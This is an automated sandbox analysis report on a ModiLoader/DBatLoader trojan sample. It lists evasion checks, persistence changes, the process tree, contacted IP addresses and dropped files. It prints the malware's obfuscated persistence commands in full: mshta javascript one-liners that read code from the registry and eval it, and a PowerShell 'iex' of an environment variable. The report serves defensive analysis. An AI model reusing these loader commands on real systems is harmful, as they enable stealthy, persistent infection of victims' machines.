Malware Analysis Report

2024-10-19 07:03

Sample ID 240508-jvvw6aae4t
Target 23e8c853177ad64150596de9fb375e62_JaffaCakes118
SHA256 278ca4a6c160148619355f407877cdcc6dc49243e9bf14e97556051341fd5a65
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

278ca4a6c160148619355f407877cdcc6dc49243e9bf14e97556051341fd5a65

Threat Level: Known bad

The file 23e8c853177ad64150596de9fb375e62_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Looks for VirtualBox Guest Additions in registry

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox drivers on disk

Looks for VMWare Tools registry key

Drops startup file

Checks computer location settings

Deletes itself

Checks BIOS information in registry

Adds Run key to start application

Maps connected drives based on registry

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-08 07:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-08 07:59

Reported

2024-05-08 08:02

Platform

win7-20240221-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\162913.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:oKCa20aI=\"po\";yl0=new%20ActiveXObject(\"WScript.Shell\");dVbi6G=\"Lvq\";Kq04fk=yl0.RegRead(\"HKCU\\\\software\\\\ruqqchx\\\\uiksnqah\");oje9BgS4=\"QbU5W4F\";eval(Kq04fk);FR9j4tB=\"7jaFN9t\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d71742\\cc24ba.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:psWz1J=\"nXqsLcKd\";Z8j=new%20ActiveXObject(\"WScript.Shell\");aZT14l=\"P6F2\";c6Wz3A=Z8j.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\ruqqchx\\\\uiksnqah\");PigX88JRU=\"LBIXdJ0\";eval(c6Wz3A);ZybZkP1m=\"753d\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:qGc7W0G=\"dI5\";J6t=new ActiveXObject(\"WScript.Shell\");HfzDEM2K=\"ei\";nZk7f=J6t.RegRead(\"HKCU\\\\software\\\\ruqqchx\\\\uiksnqah\");r35jBM=\"f2d\";eval(nZk7f);rw9HKK8sq=\"jWbc9g\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.c56af49 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.c56af49\ = "49de3d" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 2808 wrote to memory of 2632 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 2632 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 2632 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 2632 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:TKM2qUa0E="4";v9b2=new%20ActiveXObject("WScript.Shell");c8L4gwjh="z0iiQ03C";M30qJj=v9b2.RegRead("HKLM\\software\\Wow6432Node\\EJDuoXwFIl\\k1xBXm");mSQyg2U="0OWY";eval(M30qJj);KV6biq6="OUhizJ";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:spdjc

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
GB 25.175.128.53:80 tcp
US 143.229.189.151:80 tcp
US 69.34.28.18:8080 tcp
IE 160.6.100.23:80 tcp
US 24.93.254.247:80 tcp
US 54.112.101.43:80 tcp
PH 155.137.107.141:80 tcp
US 71.23.204.15:80 tcp
NO 84.210.103.160:80 tcp
KR 39.118.1.218:80 tcp
CN 120.47.251.48:80 tcp
NO 62.92.232.240:80 tcp
IT 145.14.174.66:80 tcp
FR 129.104.38.123:80 tcp
SD 197.251.69.232:80 tcp
US 40.207.212.228:80 tcp
US 166.132.127.167:80 tcp
US 173.116.248.157:80 tcp
AR 200.45.230.115:80 tcp
BR 191.255.126.3:80 tcp
SE 84.8.207.162:80 tcp
JP 61.205.243.214:80 tcp
BR 186.212.176.247:80 tcp
ZA 196.46.231.92:80 tcp
PL 93.89.197.154:80 tcp
NL 62.41.28.196:80 tcp
GB 213.52.241.175:80 tcp
US 153.48.249.41:80 tcp
CN 219.239.94.87:80 tcp
CN 112.128.20.164:80 tcp
IE 82.198.136.47:80 tcp
DE 62.96.25.95:80 tcp
US 40.195.167.177:80 tcp
US 24.171.85.1:8080 tcp
US 206.121.173.97:80 tcp
KR 61.83.244.202:80 tcp
US 75.139.209.231:80 tcp
HK 202.64.46.114:80 tcp
CA 66.131.164.118:80 tcp
N/A 127.110.167.222:80 tcp
EG 62.140.66.163:80 tcp
US 4.1.27.100:80 tcp
US 20.188.82.230:80 tcp
ID 117.54.17.44:80 tcp
IL 132.78.52.232:80 tcp
US 143.83.254.72:8080 tcp
NL 145.198.135.80:80 tcp
CN 110.16.181.248:80 tcp
KR 110.68.50.51:80 tcp
DE 134.147.10.45:80 tcp
US 209.54.91.162:80 tcp
SE 195.17.117.73:80 tcp
GB 31.125.87.100:80 tcp
GB 172.167.69.11:80 tcp
DE 138.246.228.68:80 tcp
US 30.39.243.214:80 tcp
CN 219.247.86.83:80 tcp
DE 85.205.169.109:80 tcp
CN 103.75.144.181:443 tcp
AR 200.51.42.69:443 tcp
JP 221.55.106.217:80 tcp
US 137.39.202.244:80 tcp
US 56.51.138.77:80 tcp
IT 37.177.189.14:8080 tcp
NO 136.164.166.143:80 tcp
CA 142.15.180.239:80 tcp
BR 177.163.27.131:80 tcp
SG 47.88.181.75:80 tcp
TZ 41.59.238.138:443 tcp
US 57.119.120.231:80 tcp
IT 131.1.247.196:80 tcp
NO 86.62.166.161:8080 tcp
SA 37.42.222.157:80 tcp
FR 81.194.119.170:8080 tcp
IT 146.48.6.19:80 tcp
US 137.200.205.2:80 tcp
US 76.48.210.134:8080 tcp
BR 191.21.13.117:80 tcp
EG 156.170.132.248:8080 tcp
IT 31.217.206.239:80 tcp
GB 25.220.70.228:80 tcp
US 158.16.126.162:80 tcp
KR 115.95.95.25:8080 tcp
NL 145.75.8.187:80 tcp
US 143.185.10.182:80 tcp
CN 114.64.169.205:80 tcp
US 16.161.197.144:80 tcp
US 96.172.83.219:80 tcp
KR 123.36.134.213:443 tcp
US 6.115.54.95:80 tcp
JP 220.210.20.230:80 tcp
DZ 105.111.10.119:8080 tcp
SA 100.242.91.96:80 tcp
US 147.239.224.209:80 tcp
SE 144.63.255.255:80 tcp
EG 102.13.150.17:80 tcp
SE 212.32.141.21:80 tcp
GT 190.143.198.176:80 tcp
CN 49.6.174.191:80 tcp
US 29.72.57.71:443 tcp
CA 99.231.211.28:80 tcp
IT 79.31.48.99:80 tcp
HK 103.51.111.175:80 tcp
AT 5.44.211.21:80 tcp
US 215.176.81.255:80 tcp
US 23.131.48.187:80 tcp
US 107.227.164.247:8080 tcp
CN 182.36.169.185:8080 tcp
KR 163.255.207.186:80 tcp
CO 190.146.34.161:8080 tcp
US 28.186.70.19:80 tcp
KR 210.111.237.1:80 tcp
IT 88.48.83.105:80 tcp
ZA 155.232.144.233:80 tcp
NO 148.120.166.101:443 tcp
AR 186.142.218.112:80 tcp
CN 124.174.18.119:80 tcp
CH 57.8.13.136:80 tcp
US 34.177.56.149:80 tcp
GB 86.138.198.244:80 tcp
CN 60.167.81.31:80 tcp
CN 122.86.58.150:80 tcp
US 70.199.210.21:80 tcp
KR 42.42.156.136:80 tcp
US 56.116.18.107:80 tcp
BR 45.190.253.70:80 tcp
US 26.156.64.234:443 tcp
DE 91.50.35.62:80 tcp
CN 219.230.95.35:80 tcp
ID 202.162.216.102:80 tcp
US 172.8.202.109:80 tcp
CN 1.31.240.139:80 tcp
US 152.100.134.178:80 tcp
US 48.44.61.56:80 tcp
MX 187.135.87.141:80 tcp
SA 2.91.201.42:80 tcp
US 12.83.242.193:80 tcp
FR 77.84.179.254:80 tcp
US 143.18.64.220:8080 tcp

Files

memory/2100-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2100-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2100-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2100-8-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-10-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-11-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-9-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-6-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-7-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-12-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2632-22-0x0000000005CC0000-0x0000000005D96000-memory.dmp

memory/2632-26-0x0000000005CC0000-0x0000000005D96000-memory.dmp

memory/2568-24-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-23-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-32-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-42-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-46-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-31-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-37-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-45-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-49-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-48-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-58-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-57-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-66-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-56-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-55-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-54-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-59-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-47-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-44-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-43-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-41-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-40-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-39-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-38-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-36-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-35-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-34-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-33-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-30-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/1100-67-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-81-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-80-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-78-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-77-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-76-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-74-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-72-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-70-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-79-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-75-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-73-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-71-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-69-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2632-25-0x0000000002850000-0x0000000004850000-memory.dmp

memory/1100-68-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2568-29-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-28-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-27-0x00000000000D0000-0x0000000000211000-memory.dmp

C:\Users\Admin\AppData\Local\d71742\ee03f2.bat

MD5 251c82732dbd03982f565deed73bb4f2
SHA1 2f903f60f1946953494fb995438cc2419abe59df
SHA256 4b67bfb9575e3dffcba2ad2d0c3b194119b1671d0e079ca9a2ff85b177d438f2
SHA512 1c6d1dd21ef660f870e23663b8f895f2255bf43830e93690217124a6b4a8cc563f97a4db145dd247b93bda3d49b7ef9d2ddf4ce58c72eccfb4609a356afd1344

C:\Users\Admin\AppData\Roaming\3aef84\6d4792.c56af49

MD5 1678a6b94a5f263613210ff293666256
SHA1 1c4b21f5a3ff4d55b4153eca73cceee264ac390a
SHA256 a548781b97ee4f631a917c7b6187af2ce0b4976daa3b0df3893fe22d26c5cb16
